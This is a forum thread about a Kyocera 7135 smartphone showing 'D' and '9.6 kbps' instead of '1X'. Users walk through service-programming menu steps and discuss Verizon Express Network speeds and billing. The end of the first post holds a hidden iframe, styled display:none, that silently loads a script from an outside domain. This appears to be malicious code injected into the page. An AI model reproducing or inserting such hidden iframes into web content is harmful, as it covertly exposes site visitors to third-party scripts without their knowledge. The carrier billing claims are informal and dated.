+ Reply to Thread
Results 1 to 20 of 20
  1. #1
    Registered User guitarlp's Avatar
    Join Date
    10-07-2003
    Posts
    45

    9.6 kbps on the phone screen

    Lately I've been having so many crashes I decided to do a hard reset, remove the battery for 1 hour, and then install only the programs I rely on. Doing so brought me from 4.1 megs available space to over 10 megs... and I have pretty much the same apps installed... so that's a good thing.

    Anyways, My phone used to say 1X in the upper left hand corner. Now it only stays at D. I can still connect to EN but when I go to the phone screen it says:

    Packet Data
    (phone icon here) <--9.6 kbps
    (phone icon here) --> 9.6 kbps

    What's up with this? Do I have something configured incorrectly? I've had my phone for almost 2 months now and this has never happened until I reset everything and started from scratch. I'm on the latest firmware available. Is this something I should worry about? Will it limit the phones data performance?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User guitarlp's Avatar
    Join Date
    10-07-2003
    Posts
    45
    Anyone?

  3. #3
    Registered User
    Join Date
    10-18-2002
    Location
    Reston, VA
    Posts
    264
    MIne says

    Packet Data

    <Phone Logo> High Packet Rate

    Thats it!
    Audio_***** :)
    6035-7135-Treo 650

  4. #4
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    here is a though just a though. i saw posted somewhere where you can find out settings for the phone (1x or "D") it was posted with update info. JigSawMan laid it out step by step how to do an upgrade. step h:

    h. On the Data tab, scroll down to "Idle Screen 3G Data Info" and make sure it is set to TRUE (this controls whether you see 1X or D in 1X capable areas).


    Successful upgrade to MZ1.0.44 and SZ 1.0.29

    something might have gotten messed up in the settings. unfortunatly you need a curent version of KWPST to view these settings. might have to take it in to do an update to refresh your settings, or dig around the net and find the KWPST software and check out what it says under "Idle Screen 3G Data Info"
    only thing i can think of sorry if it isn't much help

  5. #5
    Registered User guitarlp's Avatar
    Join Date
    10-07-2003
    Posts
    45
    Audio_*****... that's what mine used to say... bu not anymore.

    PNYPWR76.. I thought about that but it can't be the firmware. After I did my own firmware upgrade the phone worked fine. If I do a hard reset and connect to EN it displays the 9.6 kbps message. If I re-load my old settings it displays the 1X with the high data rate on the phone screen. But I have gotten rid of my old settings and started from scratch. Doing so has brought me to this problem. I could always put my old folder back into the palm folder and use my old settings... but I want to start from scratch. Maybe there is a specific file in there I can use to replace my current file?

  6. #6
    Registered User guitarlp's Avatar
    Join Date
    10-07-2003
    Posts
    45
    I just spent an hour and twenty minutes on the phone with Verizon trying to figure this out. This is what they ended up saying:

    If you run the old software (MZ, SZ) and do a hard reset 1X will appear in the upper left hand corner. However, if you have the latest SZ/MZ software it will display a D in the upper left hand corner. They had two 7135 phones there. 1 with the old software and 1 with the new. A hard reset on the old phone showed 1X and on the new showed D.

    He explained that the 9.6kbps showing on my screen was normal. He said that's not what I'm connected at, that's just what the modem displays.

    He also said that since I was displaying 1X with my old hotsync profile on the updated firmware that maybe my profile was telling the phone to display 1X.

    What do you guys think? Sound True? I can connect to the network like I always have... it just displays it's connection differently.

  7. #7
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Let me interject.

    Remember, 1x data is not what you are thinking it is....

    Yes, in the days of "dial up" and telephone modems, you "connect", or "negotiate" at a certain speed (e.g. 48.8kbps). That connection speed, usually reflects the best speed you will see on that connection (48.8kbps would yeild around 4.8KBps throughput).

    Now, with 1x, there is no "connection speed". It's just like a DSL or Cable connection. You are merely making a packet data (PPP)connection. The rate of speed varies at any given time based on the information being transmitted/received, and the network traffic at the time. The "9.6" is just an idle display. It's the lowest numerical value the handset can display. Once transfering data, it will change.

    So now you ask, well when I use the phone as a modem for my PC, it says "connected at 230.4kbps/115.2kbps/etc". That is showing the negotiated speed with the modem itself, not the network. Depending on your modem spped settings, and the matching modem driver/DUN settings on the PC, the connection speed will reflect one of the numbers above.

    As to the difference between a numerical TX/RX speed being shown on the handset, verses the mere "data rate" message, and the 1X verses D display, these are all settings made in the handset by the carrier, not a variation in the software.

    P.S. excuse my speeling, I don't have time to look it over.

  8. #8
    Registered User guitarlp's Avatar
    Join Date
    10-07-2003
    Posts
    45
    You were right... it's just a display... but I figured out how to fix it anyways to display 1X. I decided to do my firmware upgrade again and noticed how to change the display while doing my upgrade. So for those of you that have this problem and want 1X to display, do this:

    a. Set your phone into Service Interface mode (enter 111111 and then click options) and start the Kyocera Service Programming module.

    b. Connect to your phone (if it asks for the service code, it is 000000. Should be the default.)

    c. On the buttons on the bottom, hit READ. This will bring in the current settings on your phone.

    d. Before doing anything else, hit the SAVE button. This will allow you to make a backup of your current settings, which you could restore later if you need to.

    e. On the Data tab, scroll down to "Idle Screen 3G Data Info" and make sure it is set to TRUE (this controls whether you see 1X or D in 1X capable areas). Mine was left at nothing... neither True nor False was showing.

    f. After you are done with any changes, save them to the phone.

    g. After changes are finished being saved, reset your phone.

    That's it... your phone should now display "1X" instead of "D".

  9. #9
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    is it me or didn't i say that already?

  10. #10
    Registered User
    Join Date
    01-27-2003
    Posts
    255
    I've done the firmware upgrade, but apparently I did not follow the step to get my phone to display 1X instead of D. According to Hotsync, these are one in the same. Isn't the D supposed to represent "Digital Service" as opposed to analog? Should I be concerned with changing this? What exactly do you get with 1X? Is this an additional charge by Verizon?

  11. #11
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    it doesn't matter whether it says "D" or "1X" on the phone. 1X is only alvailable in digital areas. no "D" no "1X".it does however matter on you vz account if you have 1X or not ! I upgrades from a 6035 to the 7135 and my contract was never changed. since i couldn't use 1X with my 6035 there was no need to have it on my account. when i got my 7135 my EN did not work. i called the nohelp desk at vz customer support and they told me that since the 7135 came right out of the box with en availability all he had to do is add the 1X to my account to make it available. worked like a charm. make sure your en network settings are correct and don't worry about what it says. or look at my previous post to see how to change it.

  12. #12
    Registered User
    Join Date
    01-27-2003
    Posts
    255
    Originally posted by PNYPWR76
    it doesn't matter whether it says "D" or "1X" on the phone. 1X is only alvailable in digital areas. no "D" no "1X".it does however matter on you vz account if you have 1X or not ! I upgrades from a 6035 to the 7135 and my contract was never changed. since i couldn't use 1X with my 6035 there was no need to have it on my account. when i got my 7135 my EN did not work. i called the nohelp desk at vz customer support and they told me that since the 7135 came right out of the box with en availability all he had to do is add the 1X to my account to make it available. worked like a charm. make sure your en network settings are correct and don't worry about what it says. or look at my previous post to see how to change it.
    So EN is free? And what are you getting out of it, faster speeds than QNC? Anything else?

  13. #13
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    QNC 14.4 kbps, Express Network average speeds of 40-60 kbps and bursts up to 144 kbps.

    Doesn't cost me a dime except it uses my minutes.

  14. #14
    Registered User guitarlp's Avatar
    Join Date
    10-07-2003
    Posts
    45
    is it me or didn't i say that already?
    WOW... I can't beleive I didn see your post... must be the beers. I'm sorry about that. Thanks for taking the time to help me out though.

  15. #15
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    guitarlp-- don't worry about it. there is so much info in this site sometimes you can't possibly read it all. I'm glad you got you problem resolved. :UpThum

  16. #16
    Registered User
    Join Date
    01-27-2003
    Posts
    255
    OK, I followed the faq on setting up high speed connection, and it works. Now here's the question: Let's say I'm on my ESPN PQA and I let it sit for a minute ... the green light goes out and when I check the phone screen it says "dormant mode." If I go back to the PQA and make a new request, the green light comes back rather quickly and I get my information, pretty cool, but I'm worried about what my next bill might say. When using 1X, am I only going to be billed for the minutes when the green light is on, or am I paying for bytes? In general, how does 1X billing work with Verizon?

  17. #17
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    same as QNC. even if you are in dormant mode you will still be billed air time. make sure you disconnect your connection before you start switching apps since that has been known to cause issues. each browser should have a disconnect feature. touch the options icon while in your browser to disconnect.

  18. #18
    Registered User
    Join Date
    01-27-2003
    Posts
    255
    Originally posted by PNYPWR76
    same as QNC. even if you are in dormant mode you will still be billed air time. make sure you disconnect your connection before you start switching apps since that has been known to cause issues. each browser should have a disconnect feature. touch the options icon while in your browser to disconnect.
    OK, I know I'm being a PITA, but let me just clarify this: EN connections only use up airtime minutes - there are NO OTHER ASSOCIATED FEES FROM VERIZON?

  19. #19
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    Yes, shhhhhhhhh don't say it too loud! there are no other charges from verizon. as of yet. there was talk at one point that they were going to start charging but as of yet they are not. my recent bill does not show any extra fees. been using it for a couple of months. if anybody using EN is being charged extra for EN and just has AC plan let us know.








    I don't think anybody will respond.

  20. #20
    Registered User pnypwr76's Avatar
    Join Date
    11-28-2003
    Posts
    276
    much of this was already discussed here

    EXPRESS NETWORK ( 1X )

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts